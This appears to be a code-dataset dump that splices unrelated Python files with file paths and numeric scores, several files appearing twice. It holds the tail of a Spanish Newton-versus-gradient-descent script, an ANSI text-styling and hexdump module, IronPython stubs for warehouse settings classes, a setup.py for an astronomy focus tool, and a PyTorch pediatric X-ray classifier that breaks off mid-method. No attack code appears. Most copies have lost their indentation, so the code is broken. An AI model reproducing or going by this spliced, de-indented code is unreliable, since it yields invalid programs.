w=w-lr*grad
graf.append(fun(w))
#print(w, fun(w))
graf = np.array(graf,np.float64)
return w, graf
print('Comparación del método de Newton con el gradiente descendente:\n')
# Número de iteraciones
max_iters=20
# Tasa de aprendizaje para el gradiente descendente
lr=0.01
# Puntos de inicio
condiciones_iniciales=np.array([(2.1, -2.1),(3.0, -3.0),(1.5, 1.5),(1.0, -1.0)])
# Experimentos con resultados (no he puesto pausas porque se pausa sólo hasta que se cierre la gráfica que genera, se puede descomentar la pausa)
for w in condiciones_iniciales:
wn, grafn = newton(w, gradf, hessf, f, max_iters)
wg, grafg = gd(w, lr, gradf, f, max_iters)
# Resultados obtenidos
print('Punto de inicio:', w)
print('Solución y valor del método de Newton:')
print ('(x,y) = (', wn[0], ', ', wn[1],')')
print ('f(x,y) = ',f(wn))
print('Solución y valor del gradiente estocástico:')
print ('(x,y) = (', wg[0], ', ', wg[1],')')
print ('f(x,y) = ',f(wg))
print()
#input("\n--- Pulsar tecla para continuar ---\n")
# Curva de decrecimiento de la función
plt.plot(range(0,max_iters+1), grafn, 'bo', alpha=0.6, label='Newton')
plt.plot(range(0,max_iters+1), grafg, 'ro', alpha=0.4, label='Grad. Desc.')
plt.xlabel('Iteraciones')
plt.ylabel('f(x,y)')
plt.title('Punto de inicio: w = '+str(w))
plt.legend()
plt.show()
input("\n--- Pulsar tecla para salir ---\n") | 0.334589 | 0.588357 |
import sys
# ANSI SGR escape codes for text styles; keys are the public style names
# accepted by style_string()/style_func_stream().
_style_dict = {
    "reset": "\033[0m",
    "bold": "\033[01m",
    "disable": '\033[02m',
    "underline": '\033[04m',
    "reverse": '\033[07m',
    "strikethrough": '\033[09m',
    "invisible": '\033[08m'
}
# ANSI escape codes for foreground (text) colors.
_fg_dict = {
    "black": "\033[30m",
    "red": "\033[31m",
    "green": "\033[32m",
    "orange": "\033[33m",
    "blue": "\033[34m",
    "purple": "\033[35m",
    "cyan": "\033[36m",
    "lightgrey": "\033[37m",
    "darkgrey": "\033[90m",
    "lightred": "\033[91m",
    "lightgreen": "\033[92m",
    "yellow": "\033[93m",
    "lightblue": "\033[94m",
    "pink": "\033[95m",
    "lightcyan": "\033[96m"
}
# ANSI escape codes for background colors.
_bg_dict = {
    "black": "\033[40m",
    "red": "\033[41m",
    "green": "\033[42m",
    "orange": "\033[43m",
    "blue": "\033[44m",
    "purple": "\033[45m",
    "cyan": "\033[46m",
    "lightgrey": "\033[47m"
}
def _names2ascii(fg=None, stylename=None, bg=None) -> str:
    """Build the ANSI escape prefix for the given foreground, style and
    background names (styles first, then foreground, then background).

    *stylename* may hold several space-separated style names.
    """
    parts = []
    if stylename is not None:
        parts.extend(_style_dict[name] for name in stylename.split(" "))
    if fg is not None:
        parts.append(_fg_dict[fg])
    if bg is not None:
        parts.append(_bg_dict[bg])
    return "".join(parts)
def style_string(string: str, fg=None, stylename=None, bg=None) -> str:
    """Wrap *string* in ANSI escape codes for the given style (bold,
    underline, ...), foreground and background colors, resetting the
    terminal formatting afterwards."""
    prefix = _names2ascii(fg, stylename, bg)
    return prefix + string + _style_dict["reset"]
def style_func_stream(stream=sys.stdout, fg=None, stylename=None, bg=None):
"""Apply styles to stream and call the .
It is able to change style (like bold, underline etc), foreground and background colors of text string.
Example usage:
style_stream(_stream, fg=fg, stylename=stylename,bg=bg)\
(sys.print_exception)\
(e, _stream)
Also you may use it as decorator function."""
def decorator(func):
def wrapper(*args, **kwds):
ascii_str = _names2ascii(fg, stylename, bg)
stream.write(ascii_str)
func(*args, **kwds)
stream.write(_style_dict["reset"])
return wrapper
return decorator
def _chunks(l: bytearray, n: int):
"""Yield successive n-sized chunks from l."""
for i in range(0, len(l), n):
yield l[i:i + n]
def hexdump(bytebuffer: bytearray, offset: int = 0):
"""Print hexdump of bytearray from offset"""
for i, chunk in enumerate(_chunks(bytebuffer, 16)):
print("%08X: " % (i * 16 + offset), end="")
for byte in chunk[:8]:
print('%02X ' % byte, end="")
print(' ', end="")
for byte in chunk[8:]:
print('%02X ' % byte, end="")
for k in range(16 - len(chunk)):
print('%2s ' % " ", end="")
print(' | ', end="")
for byte in chunk:
if 0x20 <= byte <= 0x7F:
print("%c" % chr(byte), end="")
else:
print(".", end="")
print() | stylization/stylization.py | import sys
_style_dict = {
"reset": "\033[0m",
"bold": "\033[01m",
"disable": '\033[02m',
"underline": '\033[04m',
"reverse": '\033[07m',
"strikethrough": '\033[09m',
"invisible": '\033[08m'
}
_fg_dict = {
"black": "\033[30m",
"red": "\033[31m",
"green": "\033[32m",
"orange": "\033[33m",
"blue": "\033[34m",
"purple": "\033[35m",
"cyan": "\033[36m",
"lightgrey": "\033[37m",
"darkgrey": "\033[90m",
"lightred": "\033[91m",
"lightgreen": "\033[92m",
"yellow": "\033[93m",
"lightblue": "\033[94m",
"pink": "\033[95m",
"lightcyan": "\033[96m"
}
_bg_dict = {
"black": "\033[40m",
"red": "\033[41m",
"green": "\033[42m",
"orange": "\033[43m",
"blue": "\033[44m",
"purple": "\033[45m",
"cyan": "\033[46m",
"lightgrey": "\033[47m"
}
def _names2ascii(fg=None, stylename=None, bg=None) -> str:
"""Convert names of foreground, styles and background to ASCII symbols string"""
fg_string = _fg_dict[fg] if fg is not None else ""
bg_string = _bg_dict[bg] if bg is not None else ""
st_string = ""
if stylename is not None:
style_list = stylename.split(" ")
for style_item in style_list:
st_string = "".join((st_string, _style_dict[style_item]))
st_bg_fg_str = "".join((
st_string,
fg_string,
bg_string))
return st_bg_fg_str
def style_string(string: str, fg=None, stylename=None, bg=None) -> str:
"""Apply styles to text.
It is able to change style (like bold, underline etc), foreground and background colors of text string."""
ascii_str = _names2ascii(fg, stylename, bg)
return "".join((
ascii_str,
string,
_style_dict["reset"]))
def style_func_stream(stream=sys.stdout, fg=None, stylename=None, bg=None):
"""Apply styles to stream and call the .
It is able to change style (like bold, underline etc), foreground and background colors of text string.
Example usage:
style_stream(_stream, fg=fg, stylename=stylename,bg=bg)\
(sys.print_exception)\
(e, _stream)
Also you may use it as decorator function."""
def decorator(func):
def wrapper(*args, **kwds):
ascii_str = _names2ascii(fg, stylename, bg)
stream.write(ascii_str)
func(*args, **kwds)
stream.write(_style_dict["reset"])
return wrapper
return decorator
def _chunks(l: bytearray, n: int):
"""Yield successive n-sized chunks from l."""
for i in range(0, len(l), n):
yield l[i:i + n]
def hexdump(bytebuffer: bytearray, offset: int = 0):
"""Print hexdump of bytearray from offset"""
for i, chunk in enumerate(_chunks(bytebuffer, 16)):
print("%08X: " % (i * 16 + offset), end="")
for byte in chunk[:8]:
print('%02X ' % byte, end="")
print(' ', end="")
for byte in chunk[8:]:
print('%02X ' % byte, end="")
for k in range(16 - len(chunk)):
print('%2s ' % " ", end="")
print(' | ', end="")
for byte in chunk:
if 0x20 <= byte <= 0x7F:
print("%c" % chr(byte), end="")
else:
print(".", end="")
print() | 0.434941 | 0.234752 |
from __init__ import *
# no functions
# classes
class MyList(FindableList):
""" MyList() """
def ZZZ(self):
"""hardcoded/mock instance of the class"""
return MyList()
instance=ZZZ()
"""hardcoded/returns an instance of the class"""
def ToString(self):
""" ToString(self: MyList) -> str """
pass
def __getitem__(self,*args):
""" x.__getitem__(y) <==> x[y] """
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __iter__(self,*args):
""" __iter__(self: IEnumerable) -> object """
pass
def __reduce_ex__(self,*args):
pass
def __setitem__(self,*args):
""" x.__setitem__(i,y) <==> x[i]= """
pass
def __str__(self,*args):
pass
class OrderFlowLink(object):
""" OrderFlowLink(orderFlowOption: OrderFlowOption,orderSelectionCode: str,orderSelectionDescription: str,Color: str) """
def ZZZ(self):
"""hardcoded/mock instance of the class"""
return OrderFlowLink()
instance=ZZZ()
"""hardcoded/returns an instance of the class"""
@staticmethod
def __new__(self,orderFlowOption,orderSelectionCode,orderSelectionDescription,Color):
""" __new__(cls: type,orderFlowOption: OrderFlowOption,orderSelectionCode: str,orderSelectionDescription: str,Color: str) """
pass
Color=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""
Get: Color(self: OrderFlowLink) -> str
Set: Color(self: OrderFlowLink)=value
"""
OrderFlowOption=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""
Get: OrderFlowOption(self: OrderFlowLink) -> OrderFlowOption
Set: OrderFlowOption(self: OrderFlowLink)=value
"""
OrderSelectionCode=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""
Get: OrderSelectionCode(self: OrderFlowLink) -> str
Set: OrderSelectionCode(self: OrderFlowLink)=value
"""
OrderSelectionDescription=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""
Get: OrderSelectionDescription(self: OrderFlowLink) -> str
Set: OrderSelectionDescription(self: OrderFlowLink)=value
"""
class OrderFlowLinks(List):
""" OrderFlowLinks() """
def ZZZ(self):
"""hardcoded/mock instance of the class"""
return OrderFlowLinks()
instance=ZZZ()
"""hardcoded/returns an instance of the class"""
def DeleteLinksThatAreNotEqual(self,SelectionCodes):
""" DeleteLinksThatAreNotEqual(self: OrderFlowLinks,SelectionCodes: Array[str]) """
pass
def GetLinkBySelectionCode(self,Code):
""" GetLinkBySelectionCode(self: OrderFlowLinks,Code: str) -> OrderFlowLink """
pass
def ToString(self):
""" ToString(self: OrderFlowLinks) -> str """
pass
def __getitem__(self,*args):
""" x.__getitem__(y) <==> x[y] """
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __iter__(self,*args):
""" __iter__(self: IEnumerable) -> object """
pass
def __reduce_ex__(self,*args):
pass
def __setitem__(self,*args):
""" x.__setitem__(i,y) <==> x[i]= """
pass
def __str__(self,*args):
pass
class OrderFlowOption:
""" enum OrderFlowOption,values: FulFill (2),FulFillPrintInvoice (1),PrintInvoiceFulFill (0) """
def ZZZ(self):
"""hardcoded/mock instance of the class"""
return OrderFlowOption()
instance=ZZZ()
"""hardcoded/returns an instance of the class"""
def __eq__(self,*args):
""" x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """
pass
def __format__(self,*args):
""" __format__(formattable: IFormattable,format: str) -> str """
pass
def __ge__(self,*args):
pass
def __gt__(self,*args):
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __le__(self,*args):
pass
def __lt__(self,*args):
pass
def __ne__(self,*args):
pass
def __reduce_ex__(self,*args):
pass
def __str__(self,*args):
pass
FulFill=None
FulFillPrintInvoice=None
PrintInvoiceFulFill=None
value__=None
class ShippperServiceLink(object):
""" ShippperServiceLink(ShipperId: str,ServiceId: str,DeliveryMethodCode: str,DeliveryMethodName: str,Color: str) """
def ZZZ(self):
"""hardcoded/mock instance of the class"""
return ShippperServiceLink()
instance=ZZZ()
"""hardcoded/returns an instance of the class"""
@staticmethod
def __new__(self,ShipperId,ServiceId,DeliveryMethodCode,DeliveryMethodName,Color):
""" __new__(cls: type,ShipperId: str,ServiceId: str,DeliveryMethodCode: str,DeliveryMethodName: str,Color: str) """
pass
Color=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""
Get: Color(self: ShippperServiceLink) -> str
Set: Color(self: ShippperServiceLink)=value
"""
DeliveryMethodCode=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""
Get: DeliveryMethodCode(self: ShippperServiceLink) -> str
Set: DeliveryMethodCode(self: ShippperServiceLink)=value
"""
DeliveryMethodName=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""
Get: DeliveryMethodName(self: ShippperServiceLink) -> str
Set: DeliveryMethodName(self: ShippperServiceLink)=value
"""
Enabled=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""
Get: Enabled(self: ShippperServiceLink) -> bool
Set: Enabled(self: ShippperServiceLink)=value
"""
ServiceId=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""
Get: ServiceId(self: ShippperServiceLink) -> str
Set: ServiceId(self: ShippperServiceLink)=value
"""
ShipperId=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""
Get: ShipperId(self: ShippperServiceLink) -> str
Set: ShipperId(self: ShippperServiceLink)=value
"""
class ShippperServiceLinks(List):
""" ShippperServiceLinks() """
def ZZZ(self):
"""hardcoded/mock instance of the class"""
return ShippperServiceLinks()
instance=ZZZ()
"""hardcoded/returns an instance of the class"""
def DeliveryMethodCodes(self):
""" DeliveryMethodCodes(self: ShippperServiceLinks) -> List[str] """
pass
def DisableLinksWithServiceIds(self,ServiceIds):
""" DisableLinksWithServiceIds(self: ShippperServiceLinks,ServiceIds: List[str]) """
pass
def GetByDeliveryMethodCode(self,DeliveryMethodCode):
""" GetByDeliveryMethodCode(self: ShippperServiceLinks,DeliveryMethodCode: str) -> ShippperServiceLink """
pass
def GetColorForService(self,ServiceId):
""" GetColorForService(self: ShippperServiceLinks,ServiceId: str) -> str """
pass
def ServiceIds(self,ShipperId):
""" ServiceIds(self: ShippperServiceLinks,ShipperId: str) -> List[str] """
pass
def ShipperIds(self):
""" ShipperIds(self: ShippperServiceLinks) -> List[str] """
pass
def ToString(self):
""" ToString(self: ShippperServiceLinks) -> str """
pass
def __getitem__(self,*args):
""" x.__getitem__(y) <==> x[y] """
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __iter__(self,*args):
""" __iter__(self: IEnumerable) -> object """
pass
def __reduce_ex__(self,*args):
pass
def __setitem__(self,*args):
""" x.__setitem__(i,y) <==> x[i]= """
pass
def __str__(self,*args):
pass | release/stubs.min/Wms/RemotingObjects/Settings/SettingObjects.py | from __init__ import *
# no functions
# classes
class MyList(FindableList):
""" MyList() """
def ZZZ(self):
"""hardcoded/mock instance of the class"""
return MyList()
instance=ZZZ()
"""hardcoded/returns an instance of the class"""
def ToString(self):
""" ToString(self: MyList) -> str """
pass
def __getitem__(self,*args):
""" x.__getitem__(y) <==> x[y] """
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __iter__(self,*args):
""" __iter__(self: IEnumerable) -> object """
pass
def __reduce_ex__(self,*args):
pass
def __setitem__(self,*args):
""" x.__setitem__(i,y) <==> x[i]= """
pass
def __str__(self,*args):
pass
class OrderFlowLink(object):
""" OrderFlowLink(orderFlowOption: OrderFlowOption,orderSelectionCode: str,orderSelectionDescription: str,Color: str) """
def ZZZ(self):
"""hardcoded/mock instance of the class"""
return OrderFlowLink()
instance=ZZZ()
"""hardcoded/returns an instance of the class"""
@staticmethod
def __new__(self,orderFlowOption,orderSelectionCode,orderSelectionDescription,Color):
""" __new__(cls: type,orderFlowOption: OrderFlowOption,orderSelectionCode: str,orderSelectionDescription: str,Color: str) """
pass
Color=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""
Get: Color(self: OrderFlowLink) -> str
Set: Color(self: OrderFlowLink)=value
"""
OrderFlowOption=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""
Get: OrderFlowOption(self: OrderFlowLink) -> OrderFlowOption
Set: OrderFlowOption(self: OrderFlowLink)=value
"""
OrderSelectionCode=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""
Get: OrderSelectionCode(self: OrderFlowLink) -> str
Set: OrderSelectionCode(self: OrderFlowLink)=value
"""
OrderSelectionDescription=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""
Get: OrderSelectionDescription(self: OrderFlowLink) -> str
Set: OrderSelectionDescription(self: OrderFlowLink)=value
"""
class OrderFlowLinks(List):
""" OrderFlowLinks() """
def ZZZ(self):
"""hardcoded/mock instance of the class"""
return OrderFlowLinks()
instance=ZZZ()
"""hardcoded/returns an instance of the class"""
def DeleteLinksThatAreNotEqual(self,SelectionCodes):
""" DeleteLinksThatAreNotEqual(self: OrderFlowLinks,SelectionCodes: Array[str]) """
pass
def GetLinkBySelectionCode(self,Code):
""" GetLinkBySelectionCode(self: OrderFlowLinks,Code: str) -> OrderFlowLink """
pass
def ToString(self):
""" ToString(self: OrderFlowLinks) -> str """
pass
def __getitem__(self,*args):
""" x.__getitem__(y) <==> x[y] """
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __iter__(self,*args):
""" __iter__(self: IEnumerable) -> object """
pass
def __reduce_ex__(self,*args):
pass
def __setitem__(self,*args):
""" x.__setitem__(i,y) <==> x[i]= """
pass
def __str__(self,*args):
pass
class OrderFlowOption:
""" enum OrderFlowOption,values: FulFill (2),FulFillPrintInvoice (1),PrintInvoiceFulFill (0) """
def ZZZ(self):
"""hardcoded/mock instance of the class"""
return OrderFlowOption()
instance=ZZZ()
"""hardcoded/returns an instance of the class"""
def __eq__(self,*args):
""" x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """
pass
def __format__(self,*args):
""" __format__(formattable: IFormattable,format: str) -> str """
pass
def __ge__(self,*args):
pass
def __gt__(self,*args):
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __le__(self,*args):
pass
def __lt__(self,*args):
pass
def __ne__(self,*args):
pass
def __reduce_ex__(self,*args):
pass
def __str__(self,*args):
pass
FulFill=None
FulFillPrintInvoice=None
PrintInvoiceFulFill=None
value__=None
class ShippperServiceLink(object):
""" ShippperServiceLink(ShipperId: str,ServiceId: str,DeliveryMethodCode: str,DeliveryMethodName: str,Color: str) """
def ZZZ(self):
"""hardcoded/mock instance of the class"""
return ShippperServiceLink()
instance=ZZZ()
"""hardcoded/returns an instance of the class"""
@staticmethod
def __new__(self,ShipperId,ServiceId,DeliveryMethodCode,DeliveryMethodName,Color):
""" __new__(cls: type,ShipperId: str,ServiceId: str,DeliveryMethodCode: str,DeliveryMethodName: str,Color: str) """
pass
Color=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""
Get: Color(self: ShippperServiceLink) -> str
Set: Color(self: ShippperServiceLink)=value
"""
DeliveryMethodCode=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""
Get: DeliveryMethodCode(self: ShippperServiceLink) -> str
Set: DeliveryMethodCode(self: ShippperServiceLink)=value
"""
DeliveryMethodName=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""
Get: DeliveryMethodName(self: ShippperServiceLink) -> str
Set: DeliveryMethodName(self: ShippperServiceLink)=value
"""
Enabled=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""
Get: Enabled(self: ShippperServiceLink) -> bool
Set: Enabled(self: ShippperServiceLink)=value
"""
ServiceId=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""
Get: ServiceId(self: ShippperServiceLink) -> str
Set: ServiceId(self: ShippperServiceLink)=value
"""
ShipperId=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""
Get: ShipperId(self: ShippperServiceLink) -> str
Set: ShipperId(self: ShippperServiceLink)=value
"""
class ShippperServiceLinks(List):
""" ShippperServiceLinks() """
def ZZZ(self):
"""hardcoded/mock instance of the class"""
return ShippperServiceLinks()
instance=ZZZ()
"""hardcoded/returns an instance of the class"""
def DeliveryMethodCodes(self):
""" DeliveryMethodCodes(self: ShippperServiceLinks) -> List[str] """
pass
def DisableLinksWithServiceIds(self,ServiceIds):
""" DisableLinksWithServiceIds(self: ShippperServiceLinks,ServiceIds: List[str]) """
pass
def GetByDeliveryMethodCode(self,DeliveryMethodCode):
""" GetByDeliveryMethodCode(self: ShippperServiceLinks,DeliveryMethodCode: str) -> ShippperServiceLink """
pass
def GetColorForService(self,ServiceId):
""" GetColorForService(self: ShippperServiceLinks,ServiceId: str) -> str """
pass
def ServiceIds(self,ShipperId):
""" ServiceIds(self: ShippperServiceLinks,ShipperId: str) -> List[str] """
pass
def ShipperIds(self):
""" ShipperIds(self: ShippperServiceLinks) -> List[str] """
pass
def ToString(self):
""" ToString(self: ShippperServiceLinks) -> str """
pass
def __getitem__(self,*args):
""" x.__getitem__(y) <==> x[y] """
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __iter__(self,*args):
""" __iter__(self: IEnumerable) -> object """
pass
def __reduce_ex__(self,*args):
pass
def __setitem__(self,*args):
""" x.__setitem__(i,y) <==> x[i]= """
pass
def __str__(self,*args):
pass | 0.637934 | 0.113653 |
import os
from codecs import open
from setuptools import setup
try:
from ConfigParser import ConfigParser
except ImportError:
from configparser import ConfigParser
CONF = ConfigParser()
HERE = os.path.abspath(os.path.dirname(__file__))
def create_version_py(packagename, version, source_dir='.'):
package_dir = os.path.join(source_dir, packagename)
version_py = os.path.join(package_dir, 'version.py')
version_str = "# This is an automatic generated file please do not edit\n" \
"__version__ = '{:s}'".format(version)
with open(version_py, 'w') as f:
f.write(version_str)
# read content from README.md
with open(os.path.join(HERE, 'README.md')) as f:
long_description = f.read()
CONF.read([os.path.join(os.path.dirname(__file__), 'setup.cfg')])
metadata = dict(CONF.items('metadata'))
PACKAGENAME = metadata['package_name']
VERSION = metadata['version']
LICENSE = metadata['license']
DESCRIPTION = metadata['description']
LONG_DESCRIPTION = long_description
LONG_DESCRIPTION_CONTENT_TYPE = 'text/markdown'
AUTHOR = metadata['author']
AUTHOR_EMAIL = metadata['author_email']
INSTALL_REQUIRES = metadata['install_requires'].split()
# freezes version information in version.py
create_version_py(PACKAGENAME, VERSION)
setup(
name=metadata['package_name'],
version=VERSION,
description=DESCRIPTION,
long_description=LONG_DESCRIPTION,
long_description_content_type=LONG_DESCRIPTION_CONTENT_TYPE,
# The project's main homepage.
url='https://github.com/soar-telescope/goodman_focus',
# Author details
author=u'<NAME>., ',
author_email='<EMAIL>',
# Choose your license
license=LICENSE,
packages=['goodman_focus'],
package_dir={'goodman_focus': 'goodman_focus'},
python_requires=">=3.6",
install_requires=INSTALL_REQUIRES,
entry_points={
'console_scripts': [
'goodman-focus=goodman_focus.goodman_focus:run_goodman_focus',
]
}
) | setup.py | import os
from codecs import open
from setuptools import setup
try:
from ConfigParser import ConfigParser
except ImportError:
from configparser import ConfigParser
CONF = ConfigParser()
HERE = os.path.abspath(os.path.dirname(__file__))
def create_version_py(packagename, version, source_dir='.'):
package_dir = os.path.join(source_dir, packagename)
version_py = os.path.join(package_dir, 'version.py')
version_str = "# This is an automatic generated file please do not edit\n" \
"__version__ = '{:s}'".format(version)
with open(version_py, 'w') as f:
f.write(version_str)
# read content from README.md
with open(os.path.join(HERE, 'README.md')) as f:
long_description = f.read()
CONF.read([os.path.join(os.path.dirname(__file__), 'setup.cfg')])
metadata = dict(CONF.items('metadata'))
PACKAGENAME = metadata['package_name']
VERSION = metadata['version']
LICENSE = metadata['license']
DESCRIPTION = metadata['description']
LONG_DESCRIPTION = long_description
LONG_DESCRIPTION_CONTENT_TYPE = 'text/markdown'
AUTHOR = metadata['author']
AUTHOR_EMAIL = metadata['author_email']
INSTALL_REQUIRES = metadata['install_requires'].split()
# freezes version information in version.py
create_version_py(PACKAGENAME, VERSION)
setup(
name=metadata['package_name'],
version=VERSION,
description=DESCRIPTION,
long_description=LONG_DESCRIPTION,
long_description_content_type=LONG_DESCRIPTION_CONTENT_TYPE,
# The project's main homepage.
url='https://github.com/soar-telescope/goodman_focus',
# Author details
author=u'<NAME>., ',
author_email='<EMAIL>',
# Choose your license
license=LICENSE,
packages=['goodman_focus'],
package_dir={'goodman_focus': 'goodman_focus'},
python_requires=">=3.6",
install_requires=INSTALL_REQUIRES,
entry_points={
'console_scripts': [
'goodman-focus=goodman_focus.goodman_focus:run_goodman_focus',
]
}
) | 0.269422 | 0.102305 |
import torch.nn as nn
import numpy as np
import time
import cv2
import os
import shutil
import tqdm
import torch
import wandb
from utils.metrics import AUC
from data.utils import transform
from model.models import Stacking, save_dense_backbone, load_dense_backbone, save_resnet_backbone, load_resnet_backbone, Ensemble, AverageMeter
from model.utils import get_models, get_str, tensor2numpy, get_optimizer, load_ckp, lrfn, get_metrics, get_device
from utils.confidence_interval import boostrap_ci
class Pediatric_Classifier():
def __init__(self, cfg, loss_func, metrics=None):
"""Pediatric_Classifier class used to train and evaluate model performance
Args:
cfg: contain configuration.
loss_func: Loss function.
metrics (dict, optional): dictionary contains evaluation metrics. Defaults to None.
"""
self.cfg = cfg
if self.cfg.type == 'pediatric':
self.cfg.num_classes = 13*[1]
elif self.cfg.type == 'chexmic':
self.cfg.num_classes = 14*[1]
else:
self.cfg.num_classes = [1]
self.device = get_device(self.cfg.device)
self.model = get_models(self.cfg)
if self.cfg.ensemble == 'stacking':
self.stacking_model = Stacking(len(self.model))
if os.path.isfile(self.cfg.ckp_stack):
self.stacking_model.load_state_dict(torch.load(
self.cfg.ckp_stack, map_location=torch.device("cpu")))
self.stacking_model.to(self.device)
self.stacking_model.freeze()
self.loss_func = loss_func
if metrics is not None:
self.metrics = metrics
self.metrics['loss'] = self.loss_func
else:
self.metrics = {'loss': self.loss_func}
if cfg.parallel:
self.model = torch.nn.DataParallel(self.model)
self.model.to(self.device)
self.thresh_val = torch.Tensor(
[0.5]*len(self.cfg.num_classes)).float().to(self.device)
def save_backbone(self, ckp_path):
"""
Save model backbone to ckp_path.
"""
if self.cfg.parallel:
model_part = self.model.module
else:
model_part = self.model
if self.cfg.backbone == 'dense' or self.cfg.backbone == 'densenet':
save_dense_backbone(model_part, ckp_path)
elif self.cfg.backbone == 'resnet':
save_resnet_backbone(model_part, ckp_path)
def load_backbone(self, ckp_path, strict=True):
"""
Load model backbone to ckp_path.
"""
if self.cfg.parallel:
model_part = self.model.module
else:
model_part = self.model
if self.cfg.backbone == 'dense' or self.cfg.backbone == 'densenet':
load_dense_backbone(model_part, ckp_path, self.device, strict)
elif self.cfg.backbone == 'resnet':
load_resnet_backbone(model_part, ckp_path, self.device, strict)
def load_ckp(self, ckp_path, strict=True):
"""
Load model from ckp_path.
"""
return load_ckp(self.model, ckp_path, self.device, self.cfg.parallel, strict)
def save_ckp(self, ckp_path, epoch, iter):
"""
Save model to ckp_path.
"""
if os.path.exists(os.path.dirname(ckp_path)):
torch.save(
{'epoch': epoch+1,
'iter': iter+1,
'state_dict': self.model.module.state_dict() if self.cfg.parallel else self.model.state_dict()},
ckp_path
)
else:
print("Save path not exist!!!")
def predict(self, image):
"""Run prediction
Args:
image (torch.Tensor): images to predict. Shape (batch size, C, H, W)
Returns:
torch.Tensor: model prediction
"""
self.model.eval()
with torch.no_grad() as tng:
preds = self.model(image)
if not isinstance(self.model, Ensemble) and self.cfg.ensemble == 'none':
preds = nn.Sigmoid()(preds)
elif self.cfg.ensemble == 'average':
preds = preds.mean(-1)
elif self.cfg.ensemble == 'stacking':
preds = self.stacking_model(preds)
return preds
def predict_from_file(self, image_file):
"""Run prediction from image path
Args:
image_file (str): image path
Returns:
numpy array: model prediction in numpy array type
"""
image_gray = cv2.imread(image_file, 0)
image = transform(image_gray, self.cfg)
image = torch.from_numpy(image)
image = image.unsqueeze(0)
return tensor2numpy(nn.Sigmoid()(self.predict(image)))
def predict_loader(self, loader, cal_loss=False):
"""Run prediction on a given dataloader.
Args:
loader (torch.utils.data.Dataloader): a dataloader
cal_loss (bool): whether to calculate the loss. Defaults to True
Returns:
torch.Tensor, torch.Tensor, torch.Tensor: prediction, labels, loss value
"""
preds_stack = []
labels_stack = []
running_loss = AverageMeter()
ova_len = loader.dataset.n_data
loop = tqdm.tqdm(enumerate(loader), total=len(loader))
for i, data in loop:
imgs, labels = data[0].to(self.device), data[1].to(self.device)
if self.cfg.tta:
# imgs = torch.cat(imgs, dim=0)
list_imgs = [imgs[:, j] for j in range(imgs.shape[1])]
imgs = torch.cat(list_imgs, dim=0)
preds = self.predict(imgs)
batch_len = labels.shape[0]
list_preds = [preds[batch_len*j:batch_len *
(j+1)] for j in range(len(list_imgs))]
preds = torch.stack(list_preds, dim=0).mean(dim=0)
else:
preds = self.predict(imgs)
preds_stack.append(preds)
labels_stack.append(labels)
if cal_loss:
# running_loss.append(self.metrics['loss'](
# preds, labels).item()*iter_len/ova_len)
running_loss.update(self.metrics['loss'](
preds, labels).item(), imgs.shape[0])
preds_stack = torch.cat(preds_stack, 0)
labels_stack = torch.cat(labels_stack, 0)
return preds_stack, labels_stack, running_loss.avg
def train(self, train_loader, val_loader, epochs=10, iter_log=100, use_lr_sch=False, resume=False, ckp_dir='./experiment/checkpoint',
eval_metric='auc'):
"""Run training
Args:
train_loader (torch.utils.data.Dataloader): dataloader use for training
val_loader (torch.utils.data.Dataloader): dataloader use for validation
epochs (int, optional): number of training epochs. Defaults to 120.
iter_log (int, optional): logging iteration. Defaults to 100.
use_lr_sch (bool, optional): use learning rate scheduler. Defaults to False.
resume (bool, optional): resume training process. Defaults to False.
ckp_dir (str, optional): path to checkpoint directory. Defaults to './experiment/checkpoint'.
eval_metric (str, optional): name of metric for validation. Defaults to 'loss'.
"""
wandb.init(name=self.cfg.log_dir,
project='Pediatric Multi-label Classifier')
